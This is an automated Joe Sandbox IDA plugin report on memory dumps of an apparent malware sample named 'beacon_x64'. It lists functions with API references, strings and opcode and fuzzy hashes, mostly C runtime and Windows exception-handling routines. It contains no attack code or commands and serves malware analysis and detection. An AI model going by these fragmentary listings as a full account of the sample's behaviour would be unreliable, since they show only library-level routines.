Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID: _errnowrite_multi_char$_invalid_parameter_noinfowrite_charwrite_string$__updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
String ID:
API String ID: 3613058218-3916222277
Opcode ID: 99560b4e6a3ba651302837abcdacc877c80be0c82fbf8e81c16206e006ab6ccb
Instruction ID: 0f62c0ed60dd9bb6453e7674562b10cd597069d57933c14191fc680a4d325bae
Opcode Fuzzy Hash: 99560b4e6a3ba651302837abcdacc877c80be0c82fbf8e81c16206e006ab6ccb
Instruction Fuzzy Hash: C1522A30A98B498ADB2CAB5CD4553B9B7D9FB95310FA4422DD987C3252EA3CDC438742

Function 00401A70 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00401A84
RtlLookupFunctionEntry.KERNEL32 ref: 00401A9B
RtlVirtualUnwind.KERNEL32 ref: 00401ADD
SetUnhandledExceptionFilter.KERNEL32 ref: 00401B21
UnhandledExceptionFilter.KERNEL32 ref: 00401B2E
GetCurrentProcess.KERNEL32 ref: 00401B34
TerminateProcess.KERNEL32 ref: 00401B42
abort.MSVCRT ref: 00401B48

Strings

@5E, xrefs: 00401B27

Memory Dump Source

Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtualabort
String ID: @5E
API String ID: 4278921479-727458683
Opcode ID: 03ff3d805c6c5b31210b554aa0805c21f9c7c8b799266a99dd13c5c6293e079e
Instruction ID: d9c1a563eddaf3b5510b4e3cdc57f7cc7ddb545808ab7069b32be6ef691eb8bd
Opcode Fuzzy Hash: 03ff3d805c6c5b31210b554aa0805c21f9c7c8b799266a99dd13c5c6293e079e
Instruction Fuzzy Hash: A021E4B5601F55A6EB008F66FC8438A33B4B748BCAF500126EE4E5776AEF38C255C748

Function 00776B38 Relevance: 13.3, APIs: 10, Instructions: 790COMMONLIBRARYCODE

Download Yara Rule

APIs

_snprintf.LIBCMT ref: 00776CA5
_snprintf.LIBCMT ref: 00776D66
_snprintf.LIBCMT ref: 00776D83
_snprintf.LIBCMT ref: 00776FD8
_snprintf.LIBCMT ref: 007770E8
_snprintf.LIBCMT ref: 007771A6
_snprintf.LIBCMT ref: 0077725E
_snprintf.LIBCMT ref: 00777002

Part of subcall function 0077E63C: _errno.LIBCMT ref: 0077E673
Part of subcall function 0077E63C: _invalid_parameter_noinfo.LIBCMT ref: 0077E67E

_snprintf.LIBCMT ref: 00777276
_snprintf.LIBCMT ref: 00777334

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID: _snprintf$_errno_invalid_parameter_noinfo
String ID:
API String ID: 3442832105-0
Opcode ID: 5c5fb6f4a09e06ccff5c46792293312cb34477fc99d63142bfc01bcec4b0117e
Instruction ID: f5b82975888293475249d8a5f9a2b54bb07e376f7c91a8e8ef986861aeab8eea
Opcode Fuzzy Hash: 5c5fb6f4a09e06ccff5c46792293312cb34477fc99d63142bfc01bcec4b0117e
Instruction Fuzzy Hash: 1D52B83051CD899BEB5EEB2CD4426E1F3E0FFA8349F449658D989C7512EB38E582C781

Function 00401990 Relevance: 7.6, APIs: 5, Instructions: 56timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 004019D5
GetCurrentProcessId.KERNEL32 ref: 004019E0
GetCurrentThreadId.KERNEL32 ref: 004019E8
GetTickCount.KERNEL32 ref: 004019F0
QueryPerformanceCounter.KERNEL32 ref: 004019FE

Memory Dump Source

Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 50bcba46724f9b704bab53f94a1f403ca93275f12098583a90ed55ecc7962461
Instruction ID: e7f875539d2b8dca624fb493ee906b0c7b4db546ccc53074c796ddc42d9a9937
Opcode Fuzzy Hash: 50bcba46724f9b704bab53f94a1f403ca93275f12098583a90ed55ecc7962461
Instruction Fuzzy Hash: 09115EA6756B1482FB109B65FC0431973A0B788BF5F081671AE9D47BA4DE3CC589D708

Function 00402314 Relevance: 4.6, APIs: 3, Instructions: 75COMMON

Download Yara Rule

APIs

signal.MSVCRT ref: 004023B9

Memory Dump Source

Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd

Similarity

API ID: signal
String ID:
API String ID: 1946981877-0
Opcode ID: 06a55dde90fdba465f035aded498aa017c2ec9da3ac7fa2f421ff76a62bbfb83
Instruction ID: e5ed25f9ec93a45af181b237418324cd8bf01173fb15efddcc2dfe5e442f875f
Opcode Fuzzy Hash: 06a55dde90fdba465f035aded498aa017c2ec9da3ac7fa2f421ff76a62bbfb83
Instruction Fuzzy Hash: D311D06672101043FB38273AC79EB2F0002A746349F9964378E0CA3BD4C9BECD814A4E

Function 0077F1A8 Relevance: 1.8, APIs: 1, Instructions: 304COMMONLIBRARYCODE

Download Yara Rule

APIs

_initp_misc_winsig.LIBCMT ref: 0077F1DC

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID: _initp_misc_winsig
String ID:
API String ID: 2710132595-0
Opcode ID: c8c90554330dcabd03fa81e8dd660722591610607187a6cda5de2b4df199049a
Instruction ID: 6ed02826e258725671ba57642098f316ccc4990640fc8833a20bd21ba8305ae9
Opcode Fuzzy Hash: c8c90554330dcabd03fa81e8dd660722591610607187a6cda5de2b4df199049a
Instruction Fuzzy Hash: CDA1CC71619A09CFEF94FF79E8989AA37B2F768301321893A904AC3174DABCD545CF40

Function 0078CBF0 Relevance: .8, Instructions: 783COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
Instruction ID: 047cb202cb32cbd361fb387ac30e9eb36f6f2e7793930fa83288a4ac27f6ce1c
Opcode Fuzzy Hash: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
Instruction Fuzzy Hash: 57521A312286558FD31CCB1CC4B1B7AB7E1FB89340F44896DE287CB692C639DA45CB91

Function 0078C280 Relevance: .8, Instructions: 761COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
Instruction ID: 6e952b6e10d2398b4f9ba4d451bc9ae8e394cc74d181c22ff1e25a8ca73f00b2
Opcode Fuzzy Hash: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
Instruction Fuzzy Hash: C452FE312286558FD31CCF1CC5A1E7AB7E1FB8D340F448A6DE28ACB692C639E545CB91

Function 004542E4 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97b4ddaec401440707b936d21fd25615c69417223da1807987cd5829944bd07d
Instruction ID: e11ebbf839eb04482eda7839ede257aedfb4493edad218998590f42cabb9b805
Opcode Fuzzy Hash: 97b4ddaec401440707b936d21fd25615c69417223da1807987cd5829944bd07d
Instruction Fuzzy Hash: F8D0EC8B50E6D01AD3224E68086A08D2FA5B1B355934E808FEF80C7787DA0D084D8316

Function 00402F62 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a67b07fff93ef3e3d087b98e4049d786ac120a8a9678935b14bd3a1a6ec1c101
Instruction ID: a90e02ae8d049601286e53e7699458ba48d96224d24485149046b028ffd0d41f
Opcode Fuzzy Hash: a67b07fff93ef3e3d087b98e4049d786ac120a8a9678935b14bd3a1a6ec1c101
Instruction Fuzzy Hash: 90B012A7448D1181C3000F30CC013E03334D755786F042461620440192C22CC254D10C

Function 00785E1C Relevance: 16.6, APIs: 11, Instructions: 108COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00785E4E

Part of subcall function 00780D18: _getptd_noexit.LIBCMT ref: 00780D1C

__doserrno.LIBCMT ref: 00785E45

Part of subcall function 00780CA8: _getptd_noexit.LIBCMT ref: 00780CAC

__doserrno.LIBCMT ref: 00785EAB
_errno.LIBCMT ref: 00785EB2
_invalid_parameter_noinfo.LIBCMT ref: 00785F16

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
String ID:
API String ID: 388111225-0
Opcode ID: f569b21a01fad2a92039226acf8a97d91cb16fac7f3924a9cc2c8e1a455bf938
Instruction ID: fff2be4d90cf92401ea42ba4bc5326c63c7091d63712d4cf3a0f93e995025ff5
Opcode Fuzzy Hash: f569b21a01fad2a92039226acf8a97d91cb16fac7f3924a9cc2c8e1a455bf938
Instruction Fuzzy Hash: B4313970298B088FD359BF79D88A17D37D0EF82320B55075DE5568B2A2DB7CAC0683E1

Function 00786C08 Relevance: 15.1, APIs: 10, Instructions: 93COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00786C33

Part of subcall function 00780D18: _getptd_noexit.LIBCMT ref: 00780D1C

__doserrno.LIBCMT ref: 00786C2B

Part of subcall function 00780CA8: _getptd_noexit.LIBCMT ref: 00780CAC

__lock_fhandle.LIBCMT ref: 00786C77
_lseeki64_nolock.LIBCMT ref: 00786C90
_unlock_fhandle.LIBCMT ref: 00786CB3

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock_unlock_fhandle
String ID:
API String ID: 2644381645-0
Opcode ID: 1a0056bbafc3a7faafb75a0a5683c60387dc6450d26c6e1c9b28f7a797692c5c
Instruction ID: 0c8fda6eef93fbb686b8efebc9eb6e65f3c45ff7b4ba6637d29fe6f8752cc70a
Opcode Fuzzy Hash: 1a0056bbafc3a7faafb75a0a5683c60387dc6450d26c6e1c9b28f7a797692c5c
Instruction Fuzzy Hash: 8A212830698A049FE359BF6CD84637972D0EF86331F55065DE19AC7292DA6C6C0183B2

Function 00786A90 Relevance: 15.1, APIs: 10, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00786ABB

Part of subcall function 00780D18: _getptd_noexit.LIBCMT ref: 00780D1C

__doserrno.LIBCMT ref: 00786AB3

Part of subcall function 00780CA8: _getptd_noexit.LIBCMT ref: 00780CAC

__lock_fhandle.LIBCMT ref: 00786AFF
_lseek_nolock.LIBCMT ref: 00786B18
_unlock_fhandle.LIBCMT ref: 00786B39

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock_unlock_fhandle
String ID:
API String ID: 1078912150-0
Opcode ID: af586274eb7c0247a5ed565ce490a43ddd2b1adc4c580e4a875ff27a69eb19f0
Instruction ID: 385f2e988fc3817db474d85dbe76fdf806049fff92760d2fa8d7d22ff61d4456
Opcode Fuzzy Hash: af586274eb7c0247a5ed565ce490a43ddd2b1adc4c580e4a875ff27a69eb19f0
Instruction Fuzzy Hash: 092134716886009FD358BFA8D88B37D7AD0EF82334F25065CE156C7292DA7C5C0683A6

Function 00785434 Relevance: 13.6, APIs: 9, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0078545F

Part of subcall function 00780D18: _getptd_noexit.LIBCMT ref: 00780D1C

__doserrno.LIBCMT ref: 00785457

Part of subcall function 00780CA8: _getptd_noexit.LIBCMT ref: 00780CAC

__lock_fhandle.LIBCMT ref: 007854A3
_unlock_fhandle.LIBCMT ref: 007854DD

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_unlock_fhandle
String ID:
API String ID: 2464146582-0
Opcode ID: c89056d156aae0bb9c491ae48c02d203d405bbf82af9f534bcd04b22b5544d86
Instruction ID: 2b64ca8a8ed03e3c5ac881d5e5eca7074e7e6d57913a1b16fe439a060be6d92c
Opcode Fuzzy Hash: c89056d156aae0bb9c491ae48c02d203d405bbf82af9f534bcd04b22b5544d86
Instruction Fuzzy Hash: 66214C3068CA408FE358BF6CE88637C76D1EF86332F55065DE05A87292D66C6C4183E2

Function 00784C58 Relevance: 13.6, APIs: 9, Instructions: 71COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00784C79

Part of subcall function 00780D18: _getptd_noexit.LIBCMT ref: 00780D1C

__doserrno.LIBCMT ref: 00784C71

Part of subcall function 00780CA8: _getptd_noexit.LIBCMT ref: 00780CAC

__lock_fhandle.LIBCMT ref: 00784CBD
_close_nolock.LIBCMT ref: 00784CD0
_unlock_fhandle.LIBCMT ref: 00784CE9

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno_unlock_fhandle
String ID:
API String ID: 2140805544-0
Opcode ID: d63a0d9a057a00514656f61d256491cfcc4309f98023220473e92bade8306c33
Instruction ID: 4a62c962c3e7773fbd79d00c1a3bff8187ce193034bba0cbe00737cb9484d2c2
Opcode Fuzzy Hash: d63a0d9a057a00514656f61d256491cfcc4309f98023220473e92bade8306c33
Instruction Fuzzy Hash: 4211263128AA05CFD355BF69D89936876D4EF45320F65061CE51B872D2CABC980183B1

Function 0077EF6C Relevance: 12.6, APIs: 10, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

free.LIBCMT ref: 0077EF9A

Part of subcall function 0077E244: RtlFreeHeap.NTDLL ref: 0077E25A
Part of subcall function 0077E244: _errno.LIBCMT ref: 0077E264

free.LIBCMT ref: 0077EFAF
free.LIBCMT ref: 0077EFD0
free.LIBCMT ref: 0077EFE5
free.LIBCMT ref: 0077EFF9
free.LIBCMT ref: 0077F005
free.LIBCMT ref: 0077F030
free.LIBCMT ref: 0077F051
free.LIBCMT ref: 0077F06A
free.LIBCMT ref: 0077F09B

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID: free$FreeHeap_errno
String ID:
API String ID: 2737118440-0
Opcode ID: f2c387d57ff385ba375dc00a6173171a26f2c39e06d74853e0125178de0f68c4
Instruction ID: f0ce06223da6bf71102e5715bab6dde3c37a3a0a7c10d212484f1a9bdd56dd20
Opcode Fuzzy Hash: f2c387d57ff385ba375dc00a6173171a26f2c39e06d74853e0125178de0f68c4
Instruction Fuzzy Hash: 42316230265E4A8FFFA4EB58E899B6472D1F75D355F64D0ADD00EC22A2CA3C8D45C711

Function 00401D50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 185COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 00401E69

Strings

VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB
Mingw-w64 runtime failure:, xrefs: 00401D88
Address %p has no image-section, xrefs: 00401DC0
VirtualProtect failed with code 0x%x, xrefs: 00401F56

Memory Dump Source

Source File: 00000000.00000002.4561717476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4561691362.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561748173.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561817390.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561906545.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4561926467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4562067278.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_beacon_x64.jbxd

Similarity

API ID: QueryVirtual
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 1804819252-1534286854
Opcode ID: 29a604cf87b13a80806d7f9ead845a3010426e0ed6c052ed04d9aa5093f5c340
Instruction ID: 40df73200976b68941168ad0de7a995853c322167ef9a8bb8888d12721705d67
Opcode Fuzzy Hash: 29a604cf87b13a80806d7f9ead845a3010426e0ed6c052ed04d9aa5093f5c340
Instruction Fuzzy Hash: ED51DDB2701B4092DB118F22E98475E77A0F799BE9F54823AEF58173E1EA3CC581C348

Function 0076360C Relevance: 11.6, APIs: 9, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 007636A9

Part of subcall function 0077E284: _FF_MSGBANNER.LIBCMT ref: 0077E2B4
Part of subcall function 0077E284: _NMSG_WRITE.LIBCMT ref: 0077E2BE
Part of subcall function 0077E284: _callnewh.LIBCMT ref: 0077E2F2
Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E2FD
Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E308

malloc.LIBCMT ref: 007636B3

Part of subcall function 0077E284: _callnewh.LIBCMT ref: 0077E318
Part of subcall function 0077E284: _errno.LIBCMT ref: 0077E31D

malloc.LIBCMT ref: 007636BE
free.LIBCMT ref: 0076387E
free.LIBCMT ref: 00763886
free.LIBCMT ref: 0076388E

Part of subcall function 007644F0: malloc.LIBCMT ref: 0076453A
Part of subcall function 007644F0: malloc.LIBCMT ref: 00764545
Part of subcall function 007644F0: free.LIBCMT ref: 0076462C
Part of subcall function 007644F0: free.LIBCMT ref: 00764634

free.LIBCMT ref: 0076389A
free.LIBCMT ref: 007638A7
free.LIBCMT ref: 007638B4

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID: free$malloc$_errno$_callnewh
String ID:
API String ID: 4160633307-0
Opcode ID: 78c5723810e6e6d18fab4a62d391ea0db65c57382cb75ed74f6abc212771b6cb
Instruction ID: a4101892d7ddd607b376e44184bad27c24e286f0828568da059dce21c27727e6
Opcode Fuzzy Hash: 78c5723810e6e6d18fab4a62d391ea0db65c57382cb75ed74f6abc212771b6cb
Instruction Fuzzy Hash: 5481F970718B4D4BCB19AB6C98457BA73D5FB89740F54426EE88BC3243EE28DD02C686

Function 0077EE10 Relevance: 10.6, APIs: 7, Instructions: 107COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0077EE36

Part of subcall function 00780D18: _getptd_noexit.LIBCMT ref: 00780D1C

_invalid_parameter_noinfo.LIBCMT ref: 0077EE42
__crtIsPackagedApp.LIBCMT ref: 0077EE53
_dosmaperr.LIBCMT ref: 0077EE9D

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID: Packaged__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 2917016420-0
Opcode ID: cfbfe809ff06962f400f8854e8dfaca57605153f463412cb5835124c7fa4a529
Instruction ID: 53d980ce37a2e3cf7aba2c537bb7536e42466351f66169e17605c4b025d4e3cf
Opcode Fuzzy Hash: cfbfe809ff06962f400f8854e8dfaca57605153f463412cb5835124c7fa4a529
Instruction Fuzzy Hash: 3F31A230714A098FEB88AF7D984936976D1FF9C365F1486ADE44EC32A1EB7CC8418742

Function 0078973C Relevance: 10.6, APIs: 7, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00789755

Part of subcall function 00780D18: _getptd_noexit.LIBCMT ref: 00780D1C

__lock_fhandle.LIBCMT ref: 0078979D
__doserrno.LIBCMT ref: 007897D2
_errno.LIBCMT ref: 007897D9
_unlock_fhandle.LIBCMT ref: 007897E9

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID: _errno$__doserrno__lock_fhandle_getptd_noexit_unlock_fhandle
String ID:
API String ID: 4120058822-0
Opcode ID: 9341880fa3ae8ea43da77f4714028596b22b009dd5c4526b8d460d71b2af8a07
Instruction ID: bf10a15fde7db0bfa167ad56fe8b4a6a3fcd9cbaae11fadd5fdcf58b20886783
Opcode Fuzzy Hash: 9341880fa3ae8ea43da77f4714028596b22b009dd5c4526b8d460d71b2af8a07
Instruction Fuzzy Hash: DE212730798B058FD755BFA8D8D923D7690EF46320B5D051CE61BC7292D67C5C0083A1

Function 0077FB10 Relevance: 9.3, APIs: 6, Instructions: 257COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0077FB4C

Part of subcall function 00780D18: _getptd_noexit.LIBCMT ref: 00780D1C

_invalid_parameter_noinfo.LIBCMT ref: 0077FB57
memcpy_s.LIBCMT ref: 0077FC1C
_fileno.LIBCMT ref: 0077FC87
_filbuf.LIBCMT ref: 0077FCB5
_errno.LIBCMT ref: 0077FD05

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
String ID:
API String ID: 2328795619-0
Opcode ID: 4bbdce99b29ecd3e24264ac9f3b66a56e11342a03ebc5466d7d382185dba5216
Instruction ID: c9f6a9b82ba162c3aed79bea13e2ac70d537af80c9d51237c00f3f7064d996b6
Opcode Fuzzy Hash: 4bbdce99b29ecd3e24264ac9f3b66a56e11342a03ebc5466d7d382185dba5216
Instruction Fuzzy Hash: 81511D3032CF0D4B9B2C667C995A13572D1FBD57A0B25833EE45EC32A5EE68DC5242D2

Function 0077F620 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 0077F577

Part of subcall function 00780D18: _getptd_noexit.LIBCMT ref: 00780D1C

_invalid_parameter_noinfo.LIBCMT ref: 0077F582
_getstream.LIBCMT ref: 0077F5A2
_errno.LIBCMT ref: 0077F5B4
_errno.LIBCMT ref: 0077F5C6
_openfile.LIBCMT ref: 0077F5F4

Memory Dump Source

Source File: 00000000.00000002.4562316191.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_beacon_x64.jbxd

Yara matches

Similarity

API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
String ID:
API String ID: 1547050394-0
Opcode ID: 25a8bf288fd42ce426ab2ae56b53d18e2e8359fd32586f4ae3706e9ff750b65b
Instruction ID: 5a2d0af31186f7edea52c00b12f70484e13583af56bfb0dba04fe064d873f837
Opcode Fuzzy Hash: 25a8bf288fd42ce426ab2ae56b53d18e2e8359fd32586f4ae3706e9ff750b65b
Instruction Fuzzy Hash: 3A219F70618B4A8FEB90FF78980932A76D1FF99350F55497AE449C3221DF68CC418391

Function 007721F4 Relevance: 9.0, APIs: 7, Instructions: 264stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

strchr.LIBCMT ref: 0077222E
strchr.LIBCMT ref: 0077224C
malloc.LIBCMT ref: 00772264
malloc.LIBCMT ref: 00772271
rand.LIBCMT ref: 0077233D
free.LIBCMT ref: 0077245B
free.LIBCMT ref: 00772463

